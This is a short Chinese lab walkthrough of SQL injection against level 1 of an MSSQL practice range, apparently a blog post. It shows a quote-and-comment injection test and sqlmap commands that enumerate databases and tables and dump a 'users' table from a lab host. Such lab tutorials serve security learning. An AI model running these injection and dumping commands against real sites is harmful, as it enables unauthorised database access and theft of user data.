MSSQL 工具注入(第一关)

简介

SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

六、得到表中的数据

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民

相关推荐
hunzi_116 分钟前
筑牢数字防线:商城系统安全的多维守护策略
安全·系统安全
群联云防护小杜1 小时前
云服务器主动防御策略与自动化防护(下)
运维·服务器·分布式·安全·自动化·音视频
Jtti1 小时前
Jtti:nginx服务器如何限制访问频率
服务器·网络·nginx
rainFFrain1 小时前
(MySQL)库的操作
数据库·mysql
视觉&物联智能1 小时前
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
网络·人工智能·web安全·网络安全·安全威胁分析
博睿谷IT99_2 小时前
网络安全怎么入门?快速了解
安全·web安全
八股文领域大手子2 小时前
深入理解缓存淘汰策略:LRU 与 LFU 算法详解及 Java 实现
java·数据库·算法·缓存·mybatis·哈希算法
noravinsc2 小时前
django admin 中更新表数据 之后再将数据返回管理界面
数据库·django·sqlite
春风不会绿大地2 小时前
IDEA编写flinkSQL(快速体验版本,--无需配置环境)
sql·flink
学习溢出3 小时前
【网络安全】网络钓鱼的类型
网络·安全·网络安全·网络钓鱼·社会工程